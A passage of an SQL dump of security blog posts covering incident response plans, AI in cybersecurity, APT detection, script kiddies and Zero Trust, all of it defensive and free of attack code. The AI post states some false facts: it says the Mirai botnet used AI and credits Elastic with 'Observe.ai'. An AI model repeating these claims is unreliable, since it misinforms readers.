Devices\n\nIf you’re interested in hardware hacking specifically, consider starting with simpler tools like Raspberry Pi or Arduino. These low-cost, flexible devices allow you to experiment with IoT (Internet of Things) security and basic electronics hacking before jumping to multi-functional tools like Flipper Zero.\n\n## Create a Structured Learning Path\n\nA thoughtful learning path will help you build a solid foundation and maintain consistent progress. Here\'s a simple roadmap to get started.\n\n### Step 1. Learn the Basics\n\nStart with free cybersecurity primers or videos on platforms like YouTube. Specifically, look into topics such as:\n\n- What is cybersecurity?\n- Understanding common threats (e.g., phishing, malware, ransomware).\n- Introduction to ethical hacking principles.\n\n### Step 2. Get Certified\n\nEarning certifications is a great way to build credentials and structure your learning. Here are beginner-friendly certifications to consider:\n\n- **CompTIA Security+:** A certification that covers network security fundamentals.\n- **Certified Ethical Hacker (CEH):** A foundational course to help you understand ethical hacking practices.\n- **Certified Information Systems Security Professional (CISSP):** For those aiming to take cybersecurity professionally.\n\n### Step 3. Choose a Specialization\n\nCybersecurity spans many fields, including network security, malware analysis, penetration testing, and cloud security. Once you\'ve learned the basics, explore various fields to find what interests you the most.\n\n### Step 4. Hands-On Practice\n\nApply your knowledge by solving challenges, participating in Capture The Flag (CTF) competitions, or completing simulations on HackerOne or Bugcrowd.\n\n## Why Hands-On Experience Matters\n\nTheory can only take you so far. Gaining practical experience will help you develop key problem-solving skills and confidence. Start small—for example, use Wireshark to monitor the security of your home network. Platforms like Hack The Box and TryHackMe are also excellent for setting up virtual labs where you can safely practice without real-world consequences.\n\n## Connect with the Cybersecurity Community\n\nOne of the most underrated tools for success? Networking. Engaging with experienced people in cybersecurity can expose you to valuable advice, job opportunities, and learning resources.\n\n### Communities to Join\n\n- **Cybersecurity Subreddits (e.g., r/AskNetsec):** Great for asking questions or discussing cybersecurity trends.\n- **LinkedIn Groups:** Connect with professionals and stay updated on industry news. \n\nEngage with these communities to enhance your learning and career prospects in cybersecurity.', '', 'http://infoseclabs.io/uploads/1767565511958-305863866.png', 'Flipper Zero device showcasing its interface and dolphin mascot', 1, 'published', '2026-01-04 17:24:00', '2026-01-05 01:25:21', 'Information Security', 'Flipper Zero: Best Beginner Tool for Cybersecurity?', 'Discover if Flipper Zero is ideal for cybersecurity beginners. Explore its pros, cons, and alternatives to start your journey.', 'Flipper Zero'), (20, 'Why Every Organization Needs an Incident Response Plan for Cybersecurity', 'why-every-organization-needs-an-incident-response-plan-for-cybersecurity', '# What Is an Incident Response Plan (IRP) and Why Does Your Business Need One?\n\nIn today’s fast-paced digital landscape, cyber threats are becoming more advanced, and businesses can no longer afford to be reactive about cybersecurity. A single data breach or ransomware attack can bring operations to a halt, costing millions and damaging your reputation.\n\nThis is where an **Incident Response Plan (IRP)** comes in. Think of it as your organization’s cybersecurity playbook—a guide to managing and mitigating the damage caused by cyberattacks. A well-crafted IRP not only minimizes downtime but also ensures faster recovery, saving your business time, money, and stress.\n\nThis guide will explain why an IRP is essential, how it protects your business from cyber threats, and the steps to create, test, and improve it.\n\n---\n\n## Why Is an Incident Response Plan Important?\n\nWithout a solid plan in place, businesses are left scrambling to deal with cyberattacks, leading to chaos, delays, and greater financial losses. An **Incident Response Plan** is the backbone of effective cybersecurity, helping businesses stay resilient against threats. Here’s why every organization needs one:\n\n### 1. Minimize Downtime\n\nEvery second counts during a cyberattack. A strong IRP gives your team clear steps to follow, reducing system downtime and restoring operations quickly.\n\n### 2. Reduce Financial and Reputational Damage\n\nCyberattacks can result in regulatory fines, business losses, and a tarnished brand image. A swift and transparent response, guided by an IRP, can minimize these impacts.\n\n### 3. Ensure Regulatory Compliance\n\nMany industries require organizations to have an IRP as part of their cybersecurity measures. For example, companies under **GDPR**, **HIPAA**, or similar regulations must demonstrate they have plans in place to manage data breaches.\n\n### 4. Boost Customer Trust\n\nClients trust companies that can handle cyber threats effectively. A demonstrated ability to respond to incidents builds confidence and strengthens customer relationships.\n\n### 5. Reduce Stress for IT Teams\n\nCybersecurity teams face enormous pressure during an attack. An IRP eliminates the guesswork, helping them make better decisions and reducing stress.\n\n---\n\n## Components of an Effective Incident Response Plan\n\nA great IRP is more than a document—it’s a strategic guide with clear roles, processes, and actionable steps. Here are the key elements:\n\n### 1. Team Roles and Responsibilities\n\nDefine who does what during an incident. Your team may include an Incident Response Manager, IT Security Analysts, Communication Managers, and legal advisors.\n\n### 2. Incident Identification and Classification\n\nEstablish criteria for identifying incidents and their severity levels. Knowing whether a threat is minor or critical helps prioritize resources.\n\n### 3. Actionable Playbook for Threats\n\nOutline specific steps for containment, eradication, and recovery. Include backup options in case primary systems fail.\n\n### 4. Communication Protocols\n\nPlan how to share information during a crisis, both internally (IT team, executives, employees) and externally (customers, partners, regulators).\n\n### 5. Legal and Compliance Requirements\n\nDocument steps to meet legal obligations, such as notifying affected users or regulatory bodies of a data breach within the required timeline.\n\n### 6. Post-Incident Review\n\nInclude a process for reviewing incidents to identify weaknesses and improve future responses.\n\n---\n\n## How to Create an Incident Response Plan\n\nBuilding an effective IRP takes time and planning. Here are the essential steps:\n\n### Step 1. Assess Your Cybersecurity Risks\n\nIdentify your organization’s vulnerabilities. Are ransomware attacks, phishing scams, or insider threats more likely? Understanding your risks is the foundation of your plan.\n\n### Step 2. Identify Critical Assets\n\nList the most important assets to protect, such as customer data, intellectual property, or systems critical to daily operations.\n\n### Step 3. Assemble Your Incident Response Team (IRT)\n\nForm a team with defined roles, including IT staff, legal advisors, and PR experts to manage internal and external communications.\n\n### Step 4. Write a Threat Response Playbook\n\nCreate detailed steps for handling specific threats, such as ransomware, DDoS attacks, or phishing. Keep the instructions clear and easy to follow.\n\n### Step 5. Set Up Incident Documentation\n\nDevelop a system to log incidents, track how they were detected, and record steps taken to resolve them. This helps improve future responses.\n\n### Step 6. Train Employees\n\nTrain all employees—not just IT—on how to recognize and report potential threats. Cybersecurity is a team effort, and awareness is key.\n\n---\n\n## Testing and Improving Your Incident Response Plan\n\nAn IRP needs regular testing and updates to remain effective in the face of evolving cyber threats. Here’s how to keep it up to date:\n\n### 1. Simulate Real Attacks\n\nConduct mock phishing campaigns, malware simulations, or tabletop exercises to test how well your team responds.\n\n### 2. Gather Feedback\n\nAfter a test or real incident, ask your team what worked and what didn’t. Use this input to refine your plan.\n\n### 3. Update Regularly\n\nCyber threats and technologies evolve quickly. Update your IRP to include lessons learned, new tools, and regulatory changes.\n\n### 4. Track Key Metrics\n\nMonitor how long it takes to detect, contain, and recover from incidents. Set goals to improve these response times.\n\n### 5. Foster a Culture of Improvement\n\nTreat every incident and exercise as a learning opportunity. Share findings across teams to ensure everyone is informed and prepared.\n\n---\n\n## Build Resilience with a Strong Incident Response Plan\n\nA well-designed **Incident Response Plan** is essential in today’s cyber landscape. It’s not just a tool for IT teams—it’s a critical part of protecting your business, your customers, and your reputation. With an IRP, you can minimize downtime, reduce costs, and recover faster when faced with cyber threats.\n\nCybersecurity is no longer optional. Whether you’re a business owner or an IT professional, building and refining an IRP is a vital step toward long-term resilience and success. Start today to stay ahead of evolving cyber risks and protect what matters most.', '', 'http://infoseclabs.io/uploads/1767586151372-678797972.png', 'Illustration of a business team executing a cybersecurity incident response plan', 1, 'published', '2026-01-04 23:08:00', '2026-01-05 07:09:23', 'Information Security', 'Essential Cybersecurity: Incident Response Plans', 'Discover why an Incident Response Plan is crucial for protecting your business from cyber threats and minimizing damage.', 'Incident Response Plan'), (21, 'The Impact of AI on Cybersecurity: Opportunities and Threats', 'the-impact-of-ai-on-cybersecurity-opportunities-and-threats', '# The Impact of Artificial Intelligence on Cybersecurity\n\nArtificial intelligence (AI) is transforming industries across the globe, and cybersecurity is no exception. From enhancing threat detection and response to redefining how we approach online defenses, AI has become a powerful ally. However, it has also created new threats by amplifying the capabilities of cybercriminals.\n\nThis post explores the dual nature of AI within the realm of cybersecurity. You\'ll learn about its opportunities, risks, real-world applications, and the trends shaping its future.\n\n## How AI is Revolutionizing Cybersecurity\n\nCyber threats are more sophisticated and persistent than ever. Traditional, reactive security systems often fall short in detecting and mitigating attacks quickly. Enter AI, which has proven to be a game-changer.\n\nAI in cybersecurity excels at recognizing patterns within enormous datasets, detecting abnormalities, and responding to potential threats with speed and accuracy. It paves the way for smarter, more efficient security protocols, ultimately reshaping how organizations tackle security challenges. But as with every powerful tool, AI opens doors for both defenders and attackers.\n\n### Why AI Matters in Cybersecurity\n\n- **Volume of Threats**: Cyber threats are increasing; AI helps organizations tackle this growing challenge efficiently.\n- **Real-time Responses**: AI-driven tools offer proactive rather than reactive measures.\n- **Complexity of Patterns**: Threat detection has evolved beyond detecting \"red flags.\" Machine learning (ML) algorithms recognize complex malicious behavior patterns.\n\n## Opportunities Created by AI in Cybersecurity\n\nAI brings a wealth of opportunities to cybersecurity professionals, giving defensive systems a critical edge.\n\n### Automated Threat Detection\n\nAI can analyze vast amounts of data to identify abnormal patterns in user behavior, network traffic, or application usage. This capability minimizes an organization\'s time-to-detect (TTD) and containment of cyberattacks, which is crucial in reducing damage.\n\n**Example:** AI-driven Security Information and Event Management (SIEM) platforms leverage ML to detect anomalies in real-time. Systems like Elastic\'s Observe.ai and IBM QRadar continuously improve their accuracy over time.\n\n### Enhanced Malware Detection\n\nAI’s ability to recognize nuanced patterns means it can detect and block even \"zero-day\" malware attacks. Unlike traditional systems requiring rule-based detection, AI tools analyze the behavior of files before they execute, flagging suspicious activity.\n\n### Improved Phishing Protection\n\nPhishing attacks are among the most common cyber threats, and AI plays a vital role in combating them:\n\n- AI tools scan emails for patterns and keywords associated with phishing.\n- Natural language processing (NLP) allows AI to identify tone and wording suggestive of fraudulent emails.\n\n### Faster Incident Response\n\nUsing predictive analytics, AI can suggest remediation measures more quickly than human analysts. Automated responses also reduce reliance on manpower, saving organizations time and financial resources.\n\n### Vulnerability Management\n\nAI tools like Tenable.io automate vulnerability scanning, identifying weaknesses before attackers can exploit them. AI continuously learns from data across networks, systems, and endpoints to maintain an up-to-date understanding of organizational threats.\n\n## Threats Posed by AI in Cybersecurity\n\nDespite its promise, AI has a darker side. It introduces threats that are making cybercriminals more dangerous than ever before.\n\n### AI-driven Cyberattacks\n\nAttackers are already leveraging AI to carry out highly targeted and efficient attacks:\n\n- AI is used to crack passwords faster than brute-force tools.\n- Malware is evolving, using AI capabilities to spread autonomously and adapt to anti-malware measures.\n\n### Deepfake Technology\n\nDeepfakes are AI-generated videos or audio recordings that simulate real people’s appearances or voices. This growing threat can be used for:\n\n- Impersonating executives to facilitate wire fraud (e.g., \"CEO voice scams\").\n- Creating fake videos to spread misinformation or cause reputational harm.\n\n### Exploitation of AI Systems\n\nCybercriminals are turning AI itself into a target:\n\n- They manipulate AI\'s training data to produce false positives or negatives, weakening its effectiveness.\n- Hackers exploit vulnerabilities in AI models to carry out adversarial attacks, which alter input data in a way that causes AI tools to malfunction.\n\n### Weaponization of Data\n\nAI needs massive datasets for training, but these datasets are often sensitive and retrievable. Should an attacker gain access, they can exploit or sell this stolen information.\n\n## Real-world Cases of AI in Cybersecurity\n\n### IBM’s Watson for Cybersecurity\n\nIBM Watson uses AI to analyze and interpret thousands of threat reports daily, shortening the time it takes security analysts to interpret threat intelligence and respond.\n\n**Impact:** Reduced threat analysis time and improved security postures for large organizations.\n\n### Google’s Chronicle Backstory\n\nChronicle, a cybersecurity tool by Google, uses AI to parse and correlate data across an organization’s infrastructure. This narrows down potential threats with incredible speed and accuracy.\n\n**Impact:** AI enhances internal threat hunting, detecting behavior that evades standard tools.\n\n### AI-powered Botnets\n\nUnfortunately, AI also empowers attackers. The infamous Mirai botnet used AI to infect IoT devices worldwide, leading to massive distributed denial-of-service (DDoS) attacks in 2016.\n\n**Impact:** Highlighted vulnerabilities in IoT devices while showcasing how AI can power large-scale attacks.\n\n## Future Trends in AI and Cybersecurity\n\n### Adaptive Security Systems\n\nWe foresee traditional, static security systems giving way to AI-powered adaptive systems capable of evolving to meet dynamic threats. These systems will detect, analyze, and respond based on real-time scenarios, offering a more resilient defense.\n\n### The Rise of Federated Learning\n\nFederated learning allows AI models to be trained on decentralized datasets without transferring sensitive data. This technique will enhance privacy while ensuring robust threat detection.\n\n### AI Collaboration\n\nFuture cybersecurity tools will lean on collaborative AI. For example, algorithms from multiple organizations may share anonymized data on emerging threats, creating a unified front against cyber criminals.\n\n### Regulation of AI in Cybersecurity\n\nGovernments and regulatory bodies will likely introduce stricter frameworks to govern the ethical and controlled use of AI tools. These regulations will balance innovation with security.\n\n## Strengthening Defenses with AI\n\nThe intersection of AI and cybersecurity is an exciting, high-stakes domain. While AI is a potent enabler of security advancements, it also presents new challenges that must be carefully managed. As we move forward, the collaboration between AI technologies and human expertise will be crucial in fortifying our defenses against cyber threats.', '', 'http://infoseclabs.io/uploads/1767586386191-18351172.png', 'AI-enhanced cybersecurity defense illustration', 1, 'published', '2026-01-05 15:12:00', '2026-01-06 04:37:20', 'Information Security', 'AI\'s Role in Cybersecurity: Opportunities & Threats', 'Explore how AI transforms cybersecurity, enhancing defenses and introducing new risks. Discover its dual impact and future trends.', 'AI cybersecurity'), (22, 'Security Tool Analyst vs. Security Alerts Without Tools: Which Approach is Best?', 'security-tool-analyst-vs-security-alerts-without-tools-which-approach-is-best', '# Exploring Cybersecurity: Tools vs. Manual Analysis\n\nCybersecurity is a rapidly evolving field where protecting digital assets is critical for organizations of all sizes. With advancements in both threats and defenses, there is often debate over the best approach to security. Should we rely on technology and tools or focus on manual security alert analysis? What approach is more effective for job interviews, and do professionals really need to learn Digital Forensics and Incident Response (DFIR) manually?\n\nThis blog delves into these questions by exploring the roles of security tool analysts, examining the process of handling alerts without tools, and discussing their implications for career development and hiring. Read on to determine which approach aligns with your goals and how best to prepare for the evolving world of cybersecurity.\n\n## What is a Security Tool Analyst?\n\nSecurity tool analysts are professionals who work with software and tools specifically designed to detect, manage, and respond to security threats. Their role revolves around leveraging automated systems and platforms, such as:\n\n- SIEM (Security Information and Event Management) solutions\n- EDR (Endpoint Detection and Response) tools\n- Intrusion detection systems\n\nThese tools help analyze logs, monitor suspicious activities, and respond to security incidents efficiently.\n\n### Key Responsibilities of a Security Tool Analyst\n\n- Configuring and maintaining security tools used for threat detection.\n- Monitoring dashboards and analyzing alerts generated by security tools.\n- Investigating flagged incidents to determine their impact and severity.\n- Creating reports based on findings and providing recommendations.\n\nTools such as Splunk, QRadar, and CrowdStrike often form the backbone of their workflow, offering automation and insights critical to modern cybersecurity.\n\n### Advantages of Security Tools\n\n1. **Efficiency**: Tools automate repetitive tasks, allowing analysts to manage larger volumes of data in less time.\n2. **Accuracy**: Many tools detect intricate patterns that may be missed by manual observation, reducing the chance of human error.\n3. **Scalability**: Better suited for handling complex, large-scale networks with continuously growing traffic.\n\nHowever, reliance on tools comes with its challenges, such as overdependence and a potential gap in understanding the deeper technical mechanisms behind alerts.\n\n## Security Alerts Without Tools: A Hands-On Approach\n\nOn the other hand, some cybersecurity professionals believe in adopting manual approaches to monitoring and analyzing security alerts. This involves sifting through raw logs, network data, and endpoint activity without the use of advanced software solutions.\n\n### Challenges of Working Without Tools\n\n- **Time-Intensive**: Manually detecting, validating, and responding to alerts takes a significant amount of time.\n- **Prone to Errors**: Relying solely on human judgment can lead to mistakes, especially under time pressure.\n- **Resource-Heavy**: Requires deep expertise and consistent focus to manage alerts effectively.\n\nPractitioners argue that this approach sharpens core skills, builds a better understanding of underlying systems, and helps professionals tackle situations where they don’t have access to tools.\n\n### The Argument for Manual Security Analysis\n\nDespite its challenges, manual analysis provides a solid foundation in cybersecurity concepts. It ensures professionals can work in tool-agnostic environments and allows them to rely on expertise rather than software alone.\n\n## Security Tools vs. Manual Security Alerts\n\nWhen it comes to comparing the two approaches, several factors come into play, including efficiency, accuracy, and usability.\n\n| Factor | Security Tool Analyst | Manual Security Alerts |\n|-----------------|--------------------------------------------|--------------------------------------------------------|\n| **Efficiency** | Highly efficient, especially for large-scale data. | Time-consuming and less practical for high-volume analysis. |\n| **Accuracy** | Tools reduce human error but require proper tuning. | Deep understanding of systems minimizes false positives. |\n| **Learning Curve** | Easier to adopt with proper training. | Requires extensive technical expertise and experience. |\n| **Scalability** | Easily handles enterprise-level networks. | Limited by human capacity and resources. |\n\nIt’s clear that each method has its own strengths and weaknesses. For most organizations, the ideal approach is often a combination of both—a reliance on tools to handle efficiency and scale, paired with skilled professionals who can step in when tools fall short.\n\n## What Do Employers Look For in Interviews?\n\nIf you’re preparing for an interview as a security analyst, you may wonder which approach is more valued. The truth is, companies look for a balance between technical proficiency with tools and a foundational understanding of cybersecurity concepts.\n\n### Skills That Stand Out in Interviews\n\n- **Tool Proficiency**: Familiarity with popular platforms like Splunk, Palo Alto, or Elastic Security is almost always a plus.\n- **Problem-Solving**: Hiring managers want to see how you solve problems when tools fail or alerts are ambiguous.\n- **Foundational Knowledge**: A solid grasp of TCP/IP, intrusion detection techniques, and endpoint security matters as much as tool expertise.\n\nApplicants often gain an edge by showcasing their ability to adapt—highlighting how they’ve used tools to solve real-world challenges while demonstrating their capability to analyze security issues manually when needed.\n\n## Do Professionals Need to Learn DFIR Manually?\n\nDigital Forensics and Incident Response (DFIR) plays a critical role in addressing cybersecurity incidents. However, a common question is whether it’s essential for professionals to learn DFIR skills manually.\n\n### Pros of Learning DFIR Manually\n\n- **Deeper Insight**: Understanding the \"why\" and \"how\" behind security alerts helps identify patterns and root causes effectively.\n- **Tool Independence**: Professionals who train manually can perform investigations even without pre-configured software.\n- **Troubleshooting Complex Threats**: Manual skills ensure readiness for incidents that may crash or bypass enterprise security tools.\n\n### Cons of Manual DFIR Learning\n\n- **Time-Intensive**: Manual learning takes significant time and commitment, especially for professionals new to the field.', '', 'http://infoseclabs.io/uploads/1767838334749-937001140.jpg', 'Security analyst comparing automated tools with manual alert analysis', 1, 'published', '2026-01-07 21:12:00', '2026-01-08 05:12:23', 'Information Security', 'Security Tools vs Manual Alerts: Best Cyber Approach?', 'Explore the best cybersecurity approach: automated tools or manual alerts. Understand roles, efficiency, and career implications.', 'Cybersecurity Tools'), (23, 'How Cybersecurity Professionals Can Detect Advanced Persistent Threats (APTs)', 'how-cybersecurity-professionals-can-detect-advanced-persistent-threats-apts', '# Advanced Persistent Threats: A Comprehensive Guide\n\nAdvanced Persistent Threats (APTs) are among the most sophisticated and potentially devastating cyber threats that organizations face today. These stealthy attackers target sensitive data, critical systems, and intellectual property, often remaining undetected for months or even years. For cybersecurity professionals, the ability to detect and remediate APTs is crucial for defending organizational assets.\n\nThis guide provides an in-depth look at how cybersecurity experts can identify APTs within their networks. We\'ll explore the APT lifecycle, proactive detection measures, effective tools, and real-world case studies, equipping you with practical strategies to stay ahead of these advanced threats.\n\n## Understanding Advanced Persistent Threats\n\n### What Are They and Why Are They Significant?\n\nAdvanced Persistent Threats are prolonged, targeted cyberattacks carried out by sophisticated adversaries, often backed by nation-states or highly organized cybercriminal groups. Unlike opportunistic attacks, APTs are meticulously planned and executed, with the primary goal of stealing sensitive information, causing financial loss, or disrupting operations.\n\nWhat distinguishes APTs from other cyber threats is their **persistence** and **stealth**. Attackers work patiently to infiltrate systems, evade detection, and maintain long-term access. This makes them particularly dangerous for organizations reliant on intellectual property, financial systems, or confidential customer data.\n\n### A Perspective on Cost and Risk\n\nAPTs are expensive—not just for attackers but for their victims. According to the Ponemon Institute, the average cost of a data breach is now $4.45 million globally, and breaches involving complex APTs often result in even higher costs.\n\nUnderstanding the significance of these threats is the first step toward detection and protection.\n\n## Decoding the APT Lifecycle\n\nTo effectively identify APTs, professionals must first understand their lifecycle. The APT lifecycle generally consists of the following stages:\n\n1. **Reconnaissance** \n Attackers gather information about the target organization using open-source intelligence (OSINT), web-based research, and phishing techniques.\n\n2. **Initial Intrusion** \n Leveraging spear-phishing emails, zero-day vulnerabilities, or poorly secured credentials, attackers establish their initial entry point.\n\n3. **Lateral Movement** \n Once inside the network, attackers explore internal systems, escalate privileges, and establish backdoors to ensure continued access.\n\n4. **Data Exfiltration** \n During this phase, attackers identify and extract valuable data, often using encrypted channels to evade detection.\n\n5. **Persistence** \n Attackers install additional backdoors or maintain a dormant presence, waiting for the right moment to strike again.\n\nUnderstanding this lifecycle helps security professionals predict attacker behavior and pinpoint potential entry and action points.\n\n## Proactive Measures to Detect APTs\n\n### Establish a Comprehensive Security Framework\n\nOne of the best strategies for detecting APTs is a proactive posture. Consider implementing these foundational measures:\n\n- **Network Segmentation** \n Limit attacker mobility by breaking your network into isolated segments. Proper segmentation minimizes the damage caused during lateral movement.\n\n- **Behavioral Analysis** \n Regularly analyze user and system behavior to identify unusual patterns, such as unauthorized access attempts or unexpected file transfers.\n\n- **Threat Hunting** \n Deploy dedicated threat-hunting teams to actively search for indicators of compromise (IoCs) in your network before automated tools do.\n\n### Prioritize Frequent Security Audits\n\nPeriodic vulnerability assessments and penetration testing help identify weak links that could facilitate an APT attack. Regularly updating software and applying patches for known vulnerabilities also decreases entry points for attackers.\n\n## Tools and Technologies for APT Detection\n\nModern cybersecurity teams must leverage advanced tools and technologies to combat APTs. Here are some of the most effective solutions available:\n\n### 1. **Endpoint Detection and Response (EDR)**\n\nEDR tools like CrowdStrike and Carbon Black provide real-time monitoring and response capabilities across endpoints, ensuring early detection of malicious activities.\n\n### 2. **Network Traffic Analysis (NTA)**\n\nSolutions such as ExtraHop and Darktrace use AI and machine learning to monitor network traffic and identify anomalies indicative of APT activity.\n\n### 3. **Security Information and Event Management (SIEM)**\n\nSIEM platforms like Splunk and IBM QRadar aggregate and analyze data from networks, devices, and applications to spot compromise indicators.\n\n### 4. **Threat Intelligence Platforms**\n\nTools like Recorded Future and ThreatQuotient provide access to actionable threat intelligence regarding the latest APT tactics, techniques, and procedures (TTPs).\n\nBy integrating these technologies, organizations can detect suspicious behaviors earlier and respond more effectively.\n\n## Incident Response and Remediation Strategies\n\n### Build a Playbook for APT Incidents\n\nEvery security team should have a detailed incident response plan tailored to APT scenarios. Key steps include:\n\n1. **Containment** \n Isolate affected systems to prevent lateral movement and further compromise.\n\n2. **Eradication** \n Remove malicious files, unauthorized accounts, and backdoors from your network.\n\n3. **Recovery** \n Restore systems from secure backups and monitor closely to ensure attackers don’t return.\n\n4. **Post-Incident Review** \n Conduct a comprehensive review of the incident to identify gaps in your defenses and improve future response efforts.\n\n### Train and Empower Your Team\n\nContinuous training ensures your cybersecurity team is well-equipped to address modern threats. Focus on simulation exercises and tabletop drills to test incident readiness.\n\n## Case Studies: Real-World Examples of APT Detection\n\nLooking at real-world scenarios can provide valuable insights into APT detection and response.\n\n### 1. **APT28 and the DNC Hack**\n\nThe Russian-backed APT28 (Fancy Bear) used spear-phishing emails to infiltrate the Democratic National Committee (DNC) systems, highlighting the importance of vigilance against such sophisticated threats.', '', 'http://infoseclabs.io/uploads/1767838642945-921379380.png', 'Cybersecurity professional analyzing network data to detect APTs', 1, 'published', '2026-01-07 13:17:00', '2026-01-08 05:19:30', 'Information Security', 'Detect Advanced Persistent Threats in Cybersecurity', 'Learn how to identify and combat Advanced Persistent Threats (APTs) to protect your organization\'s sensitive data and systems.', 'Advanced Persistent Threats'); INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES (24, 'How to Defend Your Organization Against Script Kiddies', 'how-to-defend-your-organization-against-script-kiddies', '# Understanding and Defending Against Script Kiddies\n\nCyber threats come in all shapes and sizes, but one often underestimated group of attackers is the script kiddies. Despite their seemingly amateur status, they can wreak havoc on businesses and organizations of all sizes. Understanding who script kiddies are and how they operate is crucial for IT professionals and security leaders looking to safeguard their infrastructures.\n\nThis blog will explore the psychology behind script kiddies, the tools they rely on, signs of an impending attack, and detailed strategies to defend your organization. By the end, you\'ll have a robust understanding of how to proactively secure your systems and educate your team to build a human firewall against this threat.\n\n## What Are Script Kiddies and Why Should You Care?\n\nScript kiddies, or \"skiddies,\" are novice hackers who rely on pre-written scripts or hacking tools created by professional hackers. They don’t always have deep technical knowledge but can still cause significant disruption. Unlike sophisticated threat actors, their motives often range from curiosity and thrill-seeking to bragging rights.\n\nWhile they may lack the technical intelligence of seasoned cybercriminals, script kiddies pose a real threat. They exploit known vulnerabilities in systems, causing data breaches, service interruptions, or defacement of web properties. For businesses, this can mean downtime, financial loss, and damage to reputation.\n\nRemember, while their methods might seem less advanced, underestimating them is a mistake. They\'re opportunistic and relentless, searching for any weak link in your organization.\n\n## Understanding the Script Kiddy Mindset\n\nUnderstanding the motivations and approach of script kiddies is key to defending against them. Here\'s what fuels their activities:\n\n- **Thrill and Ego Boost**: Many script kiddies hack for the excitement of breaking into a system or to show off to their peers.\n- **Bragging Rights**: Defacing a website or taking a service offline often serves as a \"badge of honor.\"\n- **Ease of Access**: With a wealth of hacking tools, forums, and guides available online, almost anyone with basic computer knowledge can launch an attack.\n- **Target Preference**: Script kiddies are opportunistic and often target low-hanging fruit—organizations with weak defenses are their ideal victims.\n\nBy understanding these behaviors, you’re already better equipped to anticipate and block their attempts.\n\n## Common Tools and Techniques Used by Script Kiddies\n\nBy knowing what tools they use, you can identify vulnerabilities in your system and preemptively close gaps. Here are some popular approaches and tools commonly employed by script kiddies:\n\n1. **Scanning Tools**: Script kiddies often use automated tools like **Nmap** to scan for vulnerabilities in networks.\n2. **Brute Force Attack Tools**: Tools such as Hydra or John the Ripper are used to crack passwords by trying combinations repeatedly.\n3. **Exploit Kits**: These are pre-packaged kits (like the Metasploit Framework) that allow users to exploit known vulnerabilities in software.\n4. **Denial of Service (DoS) Attacks**: With tools like LOIC (Low Orbit Ion Cannon), script kiddies can overwhelm a server, causing unexpected downtime.\n5. **Social Engineering & Phishing Kits**: They may attempt low-tech approaches like phishing, often relying on kits purchased from underground forums.\n\nRecognizing these tools can help security teams predict likely attack methods and shore up weak points.\n\n## Spotting the Signs of an Impending Script Kiddy Attack\n\nEarly detection is vital to stopping a script kiddy in their tracks. Here are some key signs to look for within your network or systems:\n\n- Increased network scanning activity on your firewalls or intrusion detection systems (IDS).\n- Repeated failed login attempts, signaling brute force attacks.\n- Suspicious spikes in traffic, especially targeted at specific endpoints, indicating a potential DoS attack.\n- Emails or messages directing employees to click unknown links or provide credentials (phishing).\n\nMonitoring these anomalies and having alert systems in place can give you an early edge.\n\n## Strengthening Your Defenses Against Script Kiddies\n\n**Proactive security measures** are your first line of defense. Here’s how to bolster your organization’s security posture:\n\n1. **Update and Patch Regularly**: Keep all software and hardware systems updated to close existing vulnerabilities.\n2. **Employ a Strong Firewall and IDS**: Filter out malicious traffic using advanced firewalls and monitor for unusual activity with intrusion detection systems.\n3. **Enforce Strong Password Policies**: Ensure employees use complex, unique passwords and implement multi-factor authentication (MFA) for added security.\n4. **Limit Administrative Access**: Only grant high-level permissions to those who truly need them to minimize damage should an account be compromised.\n5. **Conduct Regular Security Audits**: Regular vulnerability assessments will help identify weak spots before attackers exploit them.\n\nImplementing these steps can make your organization a less attractive target for opportunistic script kiddies.\n\n## Have a Response Plan for When Attacks Occur\n\nPreventive measures are essential, but having an incident response plan ensures your team is ready to act if an attack does occur. Here’s what an effective plan should include:\n\n- **Immediate Containment**: Disconnect impacted systems from the network to prevent further damage.\n- **Root Cause Analysis**: Investigate the entry point and methods used to strengthen defenses going forward.\n- **Communication Protocols**: Notify stakeholders, employees, or customers if their data or services are affected.\n- **Recovery and Evaluation**: Restore systems from clean backups and ensure the vulnerabilities exploited during the attack are patched.\n\nTesting and updating your incident response plan helps your organization stay prepared for real-world scenarios.', '', 'http://infoseclabs.io/uploads/1767838758067-532321751.png', 'Cybersecurity professional defending against script kiddie attacks', 1, 'published', '2026-01-07 21:18:00', '2026-01-08 05:19:21', 'Information Security', 'Defend Against Script Kiddies: Essential Strategies', 'Learn how to protect your organization from script kiddies with effective strategies and insights into their tactics.', 'script kiddies'), (25, 'What is Zero Trust Security, and Why Does It Matter?', 'what-is-zero-trust-security-and-why-does-it-matter', '# Understanding the Shift to Zero Trust Security\n\nCyber threats are evolving at an unprecedented pace, with bad actors finding new ways to infiltrate even the most secure networks. To tackle this, organizations are shifting away from traditional perimeter-based defenses and adopting a more robust, modern approach to security known as **Zero Trust**.\n\nBut what exactly is Zero Trust Security, and why is it becoming the gold standard for protecting sensitive information? This blog will break down the core principles of Zero Trust, its benefits, and how your organization can implement it effectively to safeguard its data and operations.\n\n## What is Zero Trust Security?\n\nZero Trust Security is a cybersecurity model built on the principle of \"never trust, always verify.\" Unlike traditional models that assume everything inside the network is trustworthy, Zero Trust treats every user, device, and application as a potential threat until proven otherwise.\n\nThis approach is particularly crucial as businesses increasingly adopt remote work, cloud computing, and IoT devices, creating complex environments where traditional security measures can fall short. Zero Trust ensures that access to systems and data is tightly controlled and monitored, reducing the risk of breaches.\n\n### Why is Zero Trust Important?\n\nThe rise of sophisticated cyberattacks, like ransomware and supply chain breaches, highlights the need for a proactive security stance. According to IBM\'s Cost of a Data Breach Report 2023, the average cost of a data breach has reached a staggering $4.45 million. Zero Trust addresses these challenges by adapting to the modern threat landscape and focusing on the following priorities:\n\n- Securing remote workforces and cloud-based environments.\n- Protecting against insider threats.\n- Reducing the attack surface for cybercriminals.\n\n## Core Principles of Zero Trust Security\n\nTo adopt a Zero Trust framework, organizations must align with its core principles. Below, we explore the foundational tenets of this model.\n\n### 1. Least Privilege Access\n\nOne of the fundamental principles of Zero Trust is granting users and devices the minimum level of access required to perform their tasks. By limiting access, Zero Trust mitigates the damage caused by compromised accounts or insider threats. For example, an HR employee may have access to payroll systems but not operational controls for cloud servers.\n\n**Tip**: Implement role-based access control (RBAC) to manage permissions effectively.\n\n### 2. Verify, Don\'t Trust\n\nZero Trust requires continuous verification of all users and devices attempting to access resources, even if they are already inside the network. Authentication mechanisms such as multi-factor authentication (MFA) ensure users are who they claim to be.\n\n**Example**: 